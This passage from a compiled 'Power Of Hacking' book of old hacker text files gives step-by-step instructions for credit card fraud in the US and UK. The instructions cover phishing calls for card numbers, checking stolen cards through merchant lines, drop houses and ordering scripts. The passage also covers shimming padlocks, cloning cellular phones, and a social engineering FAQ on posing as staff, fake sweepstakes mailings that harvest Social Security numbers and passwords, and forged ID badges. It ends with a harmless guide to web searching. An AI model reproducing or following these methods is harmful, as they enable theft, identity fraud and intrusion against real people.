side. The curved part can now be used as a handle. Now, using a file, file down the other end until it is fairly thin. You should do this to many hairpins and file them so they are of different thicknesses so you can jimmy various locks. Look at a lock to see which side the lock opens from. If you can't tell, you will just have to try both sides. When ya find out what side it opens from, take the lock pick and stick the filed end into the inside of the horseshoe-shaped bar on whichever side the lock opens from. Now, put pressure on the handle of the lock pick (pushing down, into the crack) and pull the lock up and down. The lock will then open because the pick separated the wedge and the notch allowing it to open. Also, this technique works best on American locks. I have never picked a Master lock before because of the shape and pressure of the wedge but if anyone does it, let me know how long it took. Also, the Master lock casing is very tight so ya can't get the shim in.

Credit Card Fraud:
------------------
For most of you out there, money is hard to come by. Until now: With the recent advent of plastic money (credit cards), it is easy to use someone else's credit card to order the items you have always desired in life. The stakes are high, but the payoff is worth it.

Step One: Getting the credit card information

First off, you must obtain the crucial item: someone's credit card number. The best way to get credit card numbers is to take the blue carbons used in a credit card transaction at your local department store. These can usually be found in the garbage can next to the register, or for the more daring, in the garbage dumpster behind the store. But, due to the large amount of credit card fraud, many stores have opted to use a carbonless transaction

Page 392


Power Of Hacking速 sheet, making things much more difficult. This is where your phone comes in handy. First, look up someone in the phone book, and obtain as much information as possible about them. Then, during business hours, call in a very convincing voice - "Hello, this is John Doe from the Visa Credit Card Fraud Investigations Department. We have been informed that your credit card may have been used for fraudulent purposes, so will you please read off the numbers appearing on your Visa card for verification." Of course, use your imagination! Believe it or not, many people will fall for this ploy and give out their credit information. Now, assuming that you have your victim's credit card number, you should be able to decipher the information given. Step Two: Recognizing information from carbon copies Card examples: [American Express] XXXX XXXXXX XXXXX MM/Y1 THRU MM/Y2 JOE SHMOE [American Express] XXXX XXXXXX XXXXX MM/Y1 THRU MM/Y2 JOE SHMOE Explanation: MM/Y1 is the date the card was issued, and MM/Y2 is the expiration date. The American Express Gold Card has numbers XXXXXX XXXXXXXX XXXXXXXX, and is covered for up to $5000.00, even if the card holder is broke. [Mastercard] Mail:mtahirzahid@yahoo.com

Page 393


Power Of Hacking速 5XXX XXXX XXXX XXXX XXXX AAA DD-MM-YY MM/YY JOE SHMOE Explanation: XXXX in the second row may be asked for during the ordering process. The first date is when the card was new, and the second is when the card expires. The most frequent number combination used is 5424 1800 XXXX XXXX. There are many of these cards in circulation, but many of these are on wanted lists, so check these first. [Visa] 4XXX XXX(X) XXX(X) XXX(X) MM/YY MM/YY*VISA JOE SHMOE Explanation: Visa is the most abundant card, and is accepted almost everywhere. The "*VISA" is sometimes replaced with "BWG", or followed with a special code. These codes are as follows: [1] MM/YY*VISA V - Preferred Card [2] MM/YY*VISA CV - Classic Card [3] MM/YY*VISA PV - Premier Card Preferred Cards are backed with money, and are much safer to use. Classic Cards are newer, harder to reproduce cards with decent backing. Premier Cards are Classic Cards with Preferred coverage. Common numbers are 4448 020 XXX XXX, 4254 5123 6000 XXXX, and 4254 5123 8500 XXXX. Any 4712 1250 XXXX XXXX cards are IBM Credit Union cards, and are risky to use, although they are usually covered for large purchases. Step Three: Testing credit You should now have a Visa, Mastercard, or American Express Mail:mtahirzahid@yahoo.com

Page 394


Power Of Hacking速 credit card number, with the victim's address, zip code, and phone number. By the way, if you have problems getting the address, most phone companies offer the Address Tracking Service, which is a special number you call that will give you an address from a phone number, at a nominal charge. Now you need to check the balance of credit on the credit card (to make sure you don't run out of money), and you must also make sure that the card isn't stolen. To do this you must obtain a phone number that businesses use to check out credit cards during purchases. If you go to a department store, watch the cashier when someone makes a credit card purchase. He/she will usually call a phone number, give the credit information, and then give what is called a "Merchant Number". These numbers are usually written down on or around the register. It is easy to either find these numbers and copy them, or to wait until they call one in. Watch what they dial and wait for the 8 digit (usually) merchant number. Once you call the number, in a calm voice, read off the account number, merchant number, amount, and expiration date. The credit bureau will tell you if it is ok, and will give you an authorization number. Pretend you are writing this number down, and repeat it back to them to check it. Ignore this number completely, for it serves no real purpose. However, once you do this, the bank removes dollars equal to what you told them, because the card was supposedly used to make a purchase. Sometimes you can trick the operator by telling her the customer changed his mind and decided not to charge it. Of course, some will not allow this. Remember at all times that you are supposed to be a store clerk calling to check out the card for a purchase. Act like you are talking with a customer when he/she "cancels". Step Four: The drop Once the cards are cleared, you must find a place to have the package sent. NEVER use a drop more than once. 
The following are typical drop sites: [1] An empty house Mail:mtahirzahid@yahoo.com

Page 395


Power Of Hacking速

An empty house makes an excellent place to send things. Send the package UPS, and leave a note on the door saying, "UPS. I work days, 8 to 6. Could you please leave the package on the back door step?" You can find dozens of houses from a real estate agent by telling them you want to look around for a house. Ask for a list of twenty houses for sale, and tell them you will check out the area. Do so, until you find one that suits your needs.

[2] Rent A Spot

U-Haul sometimes rents spaces where you can have packages sent and signed for. End your space when the package arrives.

[3] People's houses

Find someone you do not know, and have the package sent there. Call ahead saying that "I called the store and they sent the package to the wrong address. It was already sent, but can you keep it there for me?" This is a very reliable way if you keep calm when talking to the people.

Do NOT try post office boxes. Most of the time, UPS will not deliver to a post office box, and many people have been caught in the past attempting to use a post office box. Also, when you have determined a drop site, keep an eye on it for suspicious characters and cars that have not been there before.

Step Five: Making the transaction

You should now have a reliable credit card number with all the necessary billing information, and a good drop site. The best place to order from is catalogues, and mail order houses. It is in your best interest to place the phone call from a pay phone, especially if it is a 1-800 number. Now, when you call, don't try to disguise your voice, thinking you will trick the salesperson into believing you are an adult. These folks are trained to detect this, so your best bet is to order in your own voice. They will ask for the following: name, name as it appears on card, phone number, billing address, expiration date, method of shipping, and product. Ask if they offer UPS Red shipping (next day arrival), because it gives them less time to research an order. If you are using American Express, you might have a bit of a problem shipping to an address other than the billing address. Also, if the salesperson starts to ask questions, do NOT hang up. Simply talk your way out of the situation, so you won't encourage investigation on the order. If everything goes right, you should have the product, free of charge. Insurance picks up the tab, and no one is any wiser. Be careful, and try not to order anything over $500. In some states, UPS requires a signature for anything over $200, not to mention that anything over $200 is defined as grand theft, as well as credit fraud. Get caught doing this, and you will bite it for a couple of years. Good luck!

Cellular Phreaking

The cellular/mobile phone system is one that is perfectly set up to be exploited by phreaks with the proper knowledge and equipment. Thanks to deregulation, the regional BOC's (Bell Operating Companies) are scattered and do not communicate much with each other. Phreaks can take advantage of this by pretending to be mobile phone customers whose "home base" is a city served by a different BOC, known as a "roamer". Since it is impractical for each BOC to keep track of the customers of all the other BOC's, they will usually allow the customer to make the calls he wishes, often with a surcharge of some sort. The bill is then forwarded to the roamer's home BOC for collection. However, it is fairly simple (with the correct tools) to create a bogus ID number for your mobile phone, and pretend to be a roamer from some other city and state, that's "just visiting".
When your BOC tries to collect for the calls from your alleged "home BOC", they will discover you are not a real customer; but by then, you can create an entirely new electronic identity, and use that instead.

How does the cellular system know who is calling, and where they are? When a mobile phone enters a cell's area of transmission, it transmits its phone number and its 8 digit ID number to that cell, who will keep track of it until it gets far enough away that the sound quality is sufficiently diminished, and then the phone is "handed off" to the cell that the customer has walked or driven into. This process continues as long as the phone has power and is turned on. If the phone is turned off (or the car is), someone attempting to call the mobile phone will receive a recording along the lines of "The mobile phone customer you have dialed has left the vehicle or driven out of the service area." When a call is made to a mobile phone, the switching equipment will check to see if the mobile phone being called is "logged in", so to speak, or present in one of the cells. If it is, the call will then act (to the speaking parties) just like a normal call - the caller may hear a busy tone, the phone may just ring, or the call may be answered.

How does the switching equipment know whether or not a particular phone is authorized to use the network? Many times, it doesn't. When a dealer installs a mobile phone, he gives the phone's ID number (an 8 digit hexadecimal number) to the local BOC, as well as the phone number the BOC assigned to the customer. Thereafter, whenever a phone is present in one of the cells, the two numbers are checked - they should be registered to the same person. If they don't match, the telco knows that an attempted fraud is taking place (or at best, some transmission error) and will not allow calls to be placed or received at that phone. However, it is impractical (especially given the present state of deregulation) for the telco to have records of every cellular customer of every BOC.
Therefore, if you're going to create a fake ID/phone number combination, it will need to be "based" in an area that has a cellular system (obviously), has a different BOC than your local area does, and has some sort of a "roamer" agreement with your local BOC.

How can one "phreak" a cellular phone? There are three general areas when phreaking cellular phones; using one you found in an unlocked car (or an unattended walk-about model), modifying your own chip set to look like a different phone, or recording the phone number/ID number combinations sent by other local cellular phones, and using those as your own. Most cellular phones include a crude "password" system to keep unauthorized users from using the phone - however, dealers often set the password (usually a 3 to 5 digit code) to the last four digits of the customer's mobile phone number. If you can find that somewhere on the phone, you're in luck. If not, it shouldn't be TOO hard to hack, since most people aren't smart enough to use something besides "1111", "1234", or whatever. If you want to modify the chip set in a cellular phone you bought (or stole), there are two chips (of course, this depends on the model and manufacturer, yours may be different) that will need to be changed - one installed at the manufacturer (often epoxied in) with the phone's ID number, and one installed by the dealer with the phone number, and possibly the security code. To do this, you'll obviously need an EPROM burner as well as the same sort of chips used in the phone (or a friendly and unscrupulous dealer!). As to recording the numbers of other mobile phone customers and using them; as far as I know, this is just theory... but it seems quite possible, if you've got the equipment to record and decode it. The cellular system would probably freak out if two phones (with valid ID/phone number combinations) were both present in the network at once, but it remains to be seen what will happen.

Exchange Scanning

Almost every exchange in the bell system has test #'s and other "goodies" such as loops with dial-ups. These "goodies" are usually found between 9900 and 9999 in your local exchange. If you have the time and initiative, scan your exchange and you may get lucky! Here are some findings in the 914-268 exchange:

9900 - ANI
9901 - ANI
9927 - OSC. TONE (POSSIBLE TONE SIDE OF A LOOP)
9936 - VOICE # TO THE TELCO CENTRAL OFFICE
9937 - VOICE # TO THE TELCO CENTRAL OFFICE
9941 - COMPUTER (DIGITAL VOICE TRANSMISSION?)
9960 - OSC. TONE (TONE SIDE LOOP) MAY ALSO BE A COMPUTER IN SOME EXCHANGES
9961 - NO RESPONSE (OTHER END OF LOOP?)
9962 - NO RESPONSE (OTHER END OF LOOP?)
9963 - NO RESPONSE (OTHER END OF LOOP?)
9966 - COMPUTER (SEE 9941)
9968 - TONE THAT DISAPPEARS--RESPONDS TO CERTAIN TOUCH-TONE KEYS

Most of the numbers between 9900 & 9999 will ring or go to a "what #, please?" operator.

U.K. CREDIT CARD FRAUD

U.K. credit card fraud is a lot easier than over in the States. The same basic 3 essentials are needed:

1...A safehouse.
2...Credit card numbers with Xp date and address.
3...Good suppliers of next day delivery goods.

1...The Safehouse

The safehouse should be on the ground floor, so as not to piss off the delivery man when he comes to drop off your freshly stolen gear. If he has to go up 10 flights in a complete dive and some 14 year old kid signs for an A2000 then he's gonna wonder! Make sure there are no nosey neighbours, a good area is one full of yuppies 'cos they all go to work during daytime. Safehouses are usually obtained by paying a month's rent in advance or putting down a deposit of say, £200. Either that or break into a place and use that.

2...Credit Card Numbers.

The card number, expiry date, start date (if possible), full name (including middle initial), phone number and full address with postcode are ideal. If you can only get the surname, and no postcode, you shouldn't have any real hassle. Just say you moved recently to your new address. Phone number is handy, if it just rings and rings but if it doesn't, then make sure it's ex-directory. You CANNOT get away with giving them a bullshit phone number. Some fussy companies want phone numbers just to cross-check on CARDNET but generally it's not needed. To recap, here's a quick check-list...

1.Card number and Xpiry date.
2.Name and address of card holder.
3.First name/initials (OPTIONAL)
4.Start date (OPTIONAL)
5.Postcode (OPTIONAL)
6.Phone number (OPTIONAL)

If you have all 6, then you shouldn't have any hassle. Start date is the rarest item you could be asked for, postcode and initials being more common. If you are missing 3-6 then you need one helluva smoothtalking bastard on the phone line!!!!

3...The Ordering

Not everyone can order £1000's of stuff - it's not easy. You have to be cool, smooth and have some good answers to their questions. I advise that you only order up to £500 worth of stuff in one go, but if you have details 1-6 and the phone number will NOT be answered from 9-5.30 P.M. then go up to £1000 (make sure it's a GOLD card!). When getting ready to order make sure you have at least 3 times the amount of suppliers you need e.g. if you want to card 5 hard-drives, make sure you have 15 suppliers. A lot of the time, they are either out of stock, can't do next day delivery or won't deliver to a different address.

Quick check list of what you must ask before handing over number:

1.Next day delivery, OK?
2.Ordered to different address to card, OK?
3.Do you have item in stock (pretty obvious, eh?)

Make sure you ask ALL of these questions before handing over your precious number.

Excuses...

Usual excuses for a different address are that it's a present or you're on business here for the next 5 weeks etc. Any old bullshit why it won't go to the proper address.

WARNING!*******Invoices!*******WARNING!

Invoices are sometimes sent out with the actual parcel but they are also sent out to the card owners (why do you think they need the address for?) so using a safehouse for more than 2 days is risky. A 1 day shot is safe, if they catch on then they'll stop the goods before getting a search warrant.

Credit Limits...

Limits on cards reach from £500 to £4000 on Gold cards. Your average card will be about £1000-£1500. It takes a while to build up a good credit rating in order to have large limits so don't think every card will hold 12 IBM 386's! Visa and Access are always used - American Xpress etc. are USELESS.

Access = Eurocard, Mastercard (begins with 5)
Visa = (begins with 4, 16 digit is a Gold)

A general rule is, always confirm an order to make sure credit is cleared. As the month goes on, credit is used up - the bad times are from 27th - 3rd which is when all the bills come in. Best time to card is around 11th or 12th, when the poor guy has paid off his last bill so you can run up a new one (he, he, he!).

Ideal items to card...

The best stuff is always computer hard-ware as it's next-day. Amigas, ST's, PC's - anything really. Blank discs are a waste of time, they're too heavy. Xternal drives, monitors - good stuff basically. Don't order any shit like VCR's, hi-fi, video-cameras, music keyboards, computer software, jewellery or anything under £300. You'll find the listed items are difficult to get next day delivery and usually won't deliver to a different address - bastards, eh? You're wasting your time with little items under £300, try to keep deliveries under 10 a day.

The drop....

Two ways of doing the drop:

1.Sign for all the gear (make sure you're there between 9.00 and 5.30 P.M.)
2.Don't turn up till around 6.30 P.M. and collect all the cards that the delivery man has left. These usually say 'you were out at XX time so could you please arrange new time for delivery or pick up from our depot'. In that case, piss off to the depot and get all the gear (need a big car!).

Remember, carding is ILLEGAL kiddies, so don't do it unless you're going to cut me in on it!!!!

THE COMPLETE SOCIAL ENGINEERING FAQ!

"There's a sucker born every minute." PT Barnum
"Don't touch me, sucka." Mr. T

By bernz (official sponsor of the 1996 Croatian Olympic Men's Synchronized Swimming Team) with shoutouts to: The Genocide2600, Silicon Toad and your big fat mama.

DISCLAIMER!!!!! THIS INFORMATION IS HERE FOR THE SOLE PURPOSE OF ENLIGHTENMENT! IF YOU USE IT AND GET CAUGHT, NO ONE IS TO BLAME BUT YOUR OWN IDIOTIC ASS!!!

SECTION I: INTRO
1.1 What is social engineering?
1.2 Why is there a FAQ about it?
1.3 Who cares?
1.4 Basic intro and other shit.

SECTION II: PHONE SOCIAL ENGINEERING
2.1 Basics
2.2 Equipment
2.3 Phreak stuff
2.4 Technique

SECTION III: SNAIL MAIL
3.1 Is Snail Mail actually useful for something?
3.2 Equipment
3.3 Technique

SECTION IV: INTERNET
4.1 Isn't this just hacking?

SECTION V: LIVE, FROM NEW YORK...
5.1 In person?
5.2 Equipment
5.3 I'm wearing a suit, now what?

SECTION VI: PUTTING IT TOGETHER
A sample problem

1.1 What is social engineering?

The hacker's jargon dictionary says this:

Social Engineering: n. Term used among crackers and samurai for cracking techniques that rely on weaknesses in wetware rather than software; the aim is to trick people into revealing passwords or other information that compromises a target system's security. Classic scams include phoning up a mark who has the required information and posing as a field service tech or a fellow employee with an urgent access problem.

This is true. Social engineering, from a narrow point of view, is basically phone scams which pit your knowledge and wits against another human. This technique is used for a lot of things, such as gaining passwords, keycards and basic information on a system or organization.

1.2 Why is there a FAQ about it?

Good question. I'm glad I asked. I made this for a few reasons. The first being that Social Engineering is rarely discussed. People discuss cracking and phreaking a lot, but the forum for social engineering ideas is stagnant at best. Hopefully this will help generate more discussion. I also find that social engineering specialists get little respect; this will show ignorant hackers what we go through to get passwords. The last reason is honestly for a bit of Neophyte training. Just another DOC for them to read so I don't get bogged with email.

1.3 Who Cares?

To Neophytes: You should, you little fuck. If you think the world of computers and security opens up to you through a keyboard and your redbox then you are so fucking dead wrong. Good. Go to your school, change your grades and be a "badass" hacker. Hacking, like real life, exists in more than just your system. You can't use proggies to solve everything. I don't mean to sound upset, but jesus, have a bit of innovation and a sense of adventure.

To Experienced Hackers: Just thought it would help a bit.

1.4 Basic intro and shit for this document.

This FAQ will address phone techniques, mail techniques, internet techniques and live techniques. I will discuss Equipment and will put some scripts of actual conversations from social engineering. There are times I might discuss things that cross the line into phreaking or traditional hacking. Don't send me email and say that my terms aren't correct and blahblahblah isn't social engineering. I use them for convenience and lack of better methods of explanation (eg I might say "dumpster diving is a form of social engineering"). Don't get technical.

SECTION II: PHONES

2.1 Basics

This is probably the most common social engineering technique. It's quick, painless and the lazy person can do it. No movement, other than fingers, is necessary. Just call the person and there you go. Of course it gets more complicated than that.

2.2 What Equipment is necessary for this?

The most important piece of hardware is your wetware. You have to have a damn quick mind. As far as physical Equipment goes, a phone is necessary. Do not have call waiting as this will make you sound less believable. There is no real reason why this does but getting beeped in the middle of a scam just throws off the rhythm. The phone should be good quality and try to avoid cordless, unless you never get static on them. Some phones have these great buttons that make office noise in the background. Caller ID units are helpful if you pull off a scam using callback. You don't want to be expecting your girlfriend and pick up the phone and say, "I wanna fuck you" only to find out it was an IBM operator confirming your identity. Operators don't want to have sex with you and so your scam is fucked. Besides, call ID units are just cool because you can say, "Hello, <blank>" when someone calls. The Radio Slut carries these pretty cheap. Something I use is a voice changer. It makes my voice sound deeper than James Earl Jones or as high as a woman. This is great if you can't change your pitch very well and you don't want to sound like a kid (rarely helpful). Being able to change gender can also be very helpful (see technique below). I got one for a gift from Sharper Image. This means that brand will cost quite a bit of cash, but it's very good quality. If anyone knows of other brands of voice changers, please inform me.

2.3 Phreaking and Social engineering?

Social Engineering and phreaking cross lines quite a lot. The most obvious reasons are because phreaks need to access Ma Bell in other ways but computers. They use con games to draw info out of operators. Redboxing, greenboxing and other phreaking techniques can be used to avoid the phone bills that come with spending WAAAAYYY too much time on the phone trying to scam a password. Through the internet, telnetting to california is free. Through ma bell, it's pricey. I say making phone calls from payphones is fine, but beware of background noise. Sounding like you're at a payphone can make you sound pretty unprofessional. Find a secluded phone booth to use.

2.4 How do I pull off a social engineering with a phone?

First thing is find your mark. Let's say you want to hit your school. Call the academic computer center (or its equivalent). Assuming you already have an account, tell them you can't access your account. At this point they might do one of two things. If they are stupid, which you hope they are, they will give you a new password. Under that precept, they'll do that for most people. Simply finger someone's account, specifically a faculty member. At this point, use your voice changer when you call and imitate that teacher the best you can. People sound different over the phone, so you'll have a bit of help. Try to make the person you're imitating a female (unless you are a female). Most of the guys running these things will give anything to a good sounding woman because the majority of the guys running minicomputers are social messes. Act like a woman (using voice changer) and you'll have anything you want from them. Most of the time the people working an area will ask for some sort of verification for your identity, often a social security number. You should find out as much information about a mark as you can (see mail and live techniques) before you even think about getting on the phone. If you say you are someone you aren't and then they ask you for verification you don't have, they will be suspicious and it will be infinitely more difficult to take that system. Once again for idiots: DO NOT TRY TO SOCIAL ENGINEER WITHOUT SUFFICIENT INFORMATION ON YOUR MARK! Once people believe you are someone, get as much as you can about the system. Ask for your password, ask for telnet numbers, etc. Do not ask for too much as it will draw suspicion. You must sound like a legitimate person. Watch your mark. Learn to speak like him/her. Does that person use contractions? Does that person say "like" a lot? Accent?
Lisp? The best way for observation of speech is to call the person as a telemarketer or telephone sweepstakes person. Even if they just tell you they can't talk to you, you can learn quite a bit from the way they speak. If they actually want to speak to you, you can use that opportunity to glean information on them. Tell them they won something and you need their address and social security number and other basic info.

WARNING: ABUSING SOMEONE'S SOCIAL SECURITY NUMBER IS ILLEGAL!!! DON'T SAY YOU WEREN'T WARNED!!!

SECTION III: SNAIL MAIL

3.1 Is snail mail really useful?

Yes. It actually is. Snail mail is not tapped. Snail mail is cheap. Snail mail is readily available. But how can you use it in social engineering? As I said above, it's difficult to find systems that just let you call with no verification. They do exist but they are rare. So therefore you need info on your mark and the mark's system. You can try the telemarketing scam, but that isn't always successful, as people do not trust telemarketers. For some reason, though, people trust the written word. Morons. People will respond to sweepstakes forms with enthusiasm and will give you whatever info you want on it. That's why snail mail is so great.

3.2 What do I need?

Obviously you need mail "equipment" which includes stamps and envelopes. But subtle things are required as well. You're going to want to have return address stickers that include "your company's" logo and name. This can be procured at places like Staples, Office Max and other stores for a relatively cheap price. The most important part to mail social engineering is a layout program. WordPerfect is okay, but I prefer QuarkXpress or PageMaker. These programs are not cheap, but can be used for plenty of other applications and are well worth their price. IF YOU GET IT PIRATED, I DON'T ADVOCATE THAT ACTION. With these DTP programs, you can emulate a totally professional document. More about this below. A private mailbox is good. If you want to be very professional, get a PO box. I'm in a band, so I use that PO box. They can be rented at a variety of places, including Post Offices and MailBoxes, etc. for low fees. Share the cost with others for great cost effectiveness.

3.3 I've got the stuff, now what?

What is your mark? Generally, for a mail social engineer, your mark is going to be a large group of people. Thus, your mail should look like a mass mail sweepstakes. Use computer labels and the like to keep this illusion. You need a list of employees from that company and their addresses. Look at the junk mail in your mail. Sweepstakes forms, mail-in orders, etc. Try to fake that look. Something with very few lines to fill in (but with your vital info on them). A watermark is always a good touch for these documents. Use the fonts a business would use and word your letters in a similar fashion. Illusion is everything. The information on these should include social security numbers. Another good idea is to say that you'll need a password to verify the prize with a voice call. Hopefully it'll be the same as their net account password. It usually is. Yes, people actually fall for this stuff. To make someone fill these out, they must be concise and visually appealing. A person filling these out cannot be hassled with difficult choices. Check Boxes are also a nice effect. These must look believable. Credibility is everything with social engineering. I cannot stress that enough. I will soon release examples, although you should be original and make some on your own. Now, after stamping and addressing your letters, send them out and wait. Soon you should receive some answers. At this point, use a standard phone social engineering. Social Security numbers are the most common verification. If you find that you need some other form, send out letters with that information. For example, sometimes mother's maiden name is used.

SECTION IV: INTERNET

4.1 Isn't this just a form of hacking?

I guess it is to a point. Hacking takes more advantage of holes in security while the social engineering takes advantage of holes in people's common sense. Finding your marks through a hole in the fingering system is a great way to start an engineer. Many fingers give full names, last logins, login locations and all sorts of info. Find someone who hasn't been on in quite some time. There are also the classic schemes. Pretending to be a sysop in an IRC or online chat room can make people give up passwords with ease. Yes, generally actions taken in the Internet or online are considered traditional hacking, but your knowledge of the average human's wetware comes into play.

SECTION V: LIVE, FROM NEW YORK...

5.1 In person?

Yup. This is pretty damn important. You can do quite a bit over a phone or through mail, but sometimes you just have to get off your ass and do things yourself. Getting a password digging through a desk is good, so is touring an office and just looking around. Even conning your way into a terminal works.

5.2 Equipment

This is the only time in hacker culture where looks matter a great deal. Don't expect to walk into VIACOM's offices wearing your Misfits T-shirt with lotsa zits and your walkman; it makes you look suspicious. Look dignified. Wear a suit. Comb your hair. Don't get out of hand. Be polite. If you want to look like you belong in that office, you should act that way, too. So you need a suit. If you weigh more than 200 lbs (and are under 6' 2") or look like you're 20 or younger, don't try this. You'll look dumb, be laughed at and possibly have security called on you. You can look like an office worker's kid if you're that young. If you can do this, go ahead. Most of us can't. Fake ID security cards (the kind that alligator clip to a belt or something) can be made with a photo, a layout program and a lamination sheet. This just makes you look more official. Sometimes one of those stick on visitor patches can be helpful.
They make you look like your Mail:mtahirzahid@yahoo.com

Page 410


Power Of Hacking速 unnatural observation is warrented by your visiting status. 5.3 I'm sweating in this suit..now what? Walk into an office building with confidence. Flash your badge or just have your visitor tag. Pretend you really belong there. That's how you look. An office with cubicles is great. Just walk around and peer at people's belongings. Find the company's UNIX minicomputer. They tend to keep them behind a big plate glass window, so you can check out how its connected. This is good scouting without having to sift through dumpsters or watching through binoculars. DO NOT TRY TO HACK WHILE IN THE BUILDING! IT'S PRETTY SUSPICIOUS LOOKING! SECTION VI: PUTTING IT TOGETHER You want to see what your school's minutes are or you want to hack a local chemical company to see their new toxins, but even if you had access it would be problematic to access the passwords because they are running a VAX. Now what? First you get a list of employees. For schools, just use the catalog. For companies, use a live engineering technique. Look for payroll sheets, or posted employee lists. If you look right, you can just ask a low level employee for a list. Remember, be calm in front of people. You have to maintain your credibility. Finger each employee's account. Find out who has or hasn't used their account in the past few months. Those who haven't are your marks. Write those names down cause your gonna play them for all they are worth, goddammit. Now we go to the phone book and get the employees addresses. Then we create a document in our DTP program that emmulates a short sweepstakes form or another short document commonly encountered in the field. It must look professional but subtle enough not to look false. Credibility once again. Remember to include the social security number space as well as other information. Send these out and wait or masturbate or whatever you do for a few days. 
Yes, you're going to have to spend $10 on stamps unless you are on good terms with who you Mail:mtahirzahid@yahoo.com

Page 411


Power Of Hacking速 engineered in person. If they trust you, go back and use the stamping machine..might as well. Now get your phone and call their sysadm. Use women voices first because the guys that run these machines have rarely seen daylight, let alone women. They are EASILY manipulated with a woman's voice. Sound helpless, they love it. If they don't give you your password, you'll have plenty of info for them for verification. If you pretend to be a woman, they'll give youplenty of leway. Go as far as saying you've seen them at work and think they are cute. Watch the passwords fly. How to use the Web to look up information on hacking ____________________________________________________________ Want to become really, really unpopular? Try asking your hacker friends too many questions of the wrong sort. But, but, how do we know what are the wrong questions to ask? OK, I sympathize with your problems because I get flamed a lot, too. That's partly because I sincerely believe in asking dumb questions. I make my living asking dumb questions. People pay me lots of money to go to conferences, call people on the phone and hang out on Usenet news groups asking dumb questions so I can find out stuff for them. And, guess what, sometimes the dumbest questions get you the best answers. So that's why you don't see me flaming people who ask dumb questions. ******************************************************** Newbie note: Have you been too afraid to ask the dumb question, "What is a flame?" Now you get to find out! It is a bunch of obnoxious rantings and ravings made in email or a Usenet post by some idiot who thinks he or she is proving his or her mental superiority through use of foul and/or impolite language such as "you suffer from rectocranial inversion," f*** y***, d****, b****, and of course @#$%^&*! This newbie note is my flame against those flamers to whom I am soooo superior. 
********************************************************

But even though dumb questions can be good to ask, you may not like the flames they bring down on you. So, if you want to avoid flames, how do you find out answers for yourself? This Guide covers one way to find out hacking information without having to ask people questions: by surfing the Web. The other way is to buy lots and lots of computer manuals, but that costs a lot of money. Also, in some parts of the world it is difficult to get manuals. Fortunately, however, almost anything you want to learn about computers and communications is available for free somewhere on the Web.

First, let's consider the Web search engines. Some just help you search the Web itself. But others enable you to search Usenet newsgroups that have been archived for many years back. Also, the best hacker email lists are archived on the Web, as well.

More how to search for hacker knowledge...

There are two major considerations in using Web search engines. One is what search engine to use, and the other is the search tactics themselves. I have used many Web search engines. But eventually I came to the conclusion that for serious research, you only need two: Altavista (<http://altavista.digital.com/>) and Dejanews (<http://www.dejanews.com/>). Altavista is the best for the Web, while Dejanews is the best one for searching Usenet news groups. But, if you don't want to take me at my word, you may surf over to a site with links to almost all the Web and Newsgroup search engines at <http://sgk.tiac.net/search/>.

But just how do you efficiently use these search engines? If you ask them to find "hacker" or even "how to hack," you will get bazillions of Web sites and news group posts to read. OK, so you painfully surf through one hacker Web site after another. You get portentous-sounding organ music, skulls with red rolling eyes, animated fires burning, and each site has links to other sites with pretentious music and ungrammatical boastings about "I am 31337, d00dz!!! I am so *&&^%$ good at hacking you should bow down and kiss my $%^&&*!" But somehow they don't seem to have any actual information. Hey, welcome to the wannabe hacker world!

You need to figure out some words that help the search engine of your choice get more useful results. For example, let's say you want to find out whether I, the Supreme R00ler of the Happy Hacker world, am an elite hacker chick or merely some poser. Now the luser approach would be to simply go to http://www.dejanews.com and do a search of Usenet news groups for "Carolyn Meinel," being sure to click the "old" button to bring up stuff from years back. But if you do that, you get this huge long list of posts, most of which have nothing to do with hacking:

CDMA vs GSM - carolyn meinel <cmeinel@unm.edu> 1995/11/17
Re: October El Nino-Southern Oscillation info - gonthier@usgs.gov (Gerard J. Gonthier) 1995/11/20
Re: Internic Wars - MrGlucroft@psu.edu (The Reaver) 1995/11/30
shirkahn@earthlink.net (Christopher Proctor) 1995/12/16
Re: Lyndon LaRouche - who is he? - lness@ucs.indiana.edu (lester john ness) 1996/01/06
U-B Color Index observation data - cmeinel@nmia.com (Carolyn P. Meinel) 1996/05/13
Re: Mars Fraud? History of one scientist involved - gksmiley@aol.com (GK Smiley) 1996/08/11
Re: Mars Life Announcement: NO Fraud Issue - twitch@hub.ofthe.net 1996/08/12
Hackers Helper E-Zine wanted - rcortes@tuna.hooked.net (Raul Cortes) 1996/12/06
Carolyn Meinel, Sooooooper Genius - nobody@cypherpunks.ca (John Anonymous MacDonald, a remailer node) 1996/12/12

Anyhow, this list goes on and on and on. But if you specify "Carolyn Meinel hacker" and click "all" instead of "any" on the "Boolean" button, you get a list that starts with:

Media: "Unamailer delivers Christmas grief" - Mannella@ipifidpt.difi.unipi.it (Riccardo Mannella) 1996/12/30
Cu Digest, #8.93, Tue 31 Dec 96 - Cu Digest (tk0jut2@mvs.cso.niu.edu) <TK0JUT2@MVS.CSO.NIU.EDU> 1996/12/31
RealAudio interview with Happy Hacker - bmcw@redbud.mv.com (Brian S. McWilliams) 1997/01/08

Etc.
This way all those posts about my boring life in the world of science don't show up, just the juicy hacker stuff. Now suppose all you want to see is flames about what a terrible hacker I am. You could bring those to the top of the list by adding (with the "all" button still on) "flame" or "f***" or "b****", being careful to spell out those bad words instead of fubarring them with ****s. For example, a search on "Carolyn Meinel hacker flame" with Boolean "all" turns up only one post. This important tome says the Happy Hacker list is a dire example of what happens when us prudish moderator types censor naughty words and inane diatribes.

******************************************
Newbie note: "Boolean" is a math term. On the Dejanews search engine they figure the user doesn't have a clue what "Boolean" means, so they give you a choice of "any" or "all" and then label it "Boolean" so you feel stupid if you don't understand it. But in real Boolean algebra we can use the operators "and", "or" and "not" on word searches (or any searches of sets). "And" means you would have a search that turns up only items that have "all" the terms you specify; "or" means you would have a search that turns up "any" of the terms. The "not" operator would exclude items that included the "not" term even if they have any or all of the other search terms. Altavista has real Boolean algebra under its "advanced" search option.
******************************************

But let's forget all those Web search engines for a minute. In my humble yet old-fashioned opinion, the best way to search the Web is to use it exactly the way its inventor, Tim Berners-Lee, intended. You start at a good spot and then follow the links to related sites. Imagine that!

Here's another of my old fogie tips. If you want to really whiz around the Web, and if you have a shell account, you can do it with the program lynx. At the prompt, just type "lynx" followed by the URL you want to visit. Because lynx only shows text, you don't have to waste time waiting for the

More how to search for hacker knowledge...

So where are good places to start? Simply surf over to the Web sites listed at the end of this Guide. Not only do they carry archives of these Guides, they carry a lot of other valuable information for the newbie hacker, as well as links to other quality sites. My favorites are http://www.cs.utexas.edu/users/matt/hh.html and http://www.silitoad.org Warning: parental discretion advised. You'll see some other great starting points elsewhere in this Guide, too.

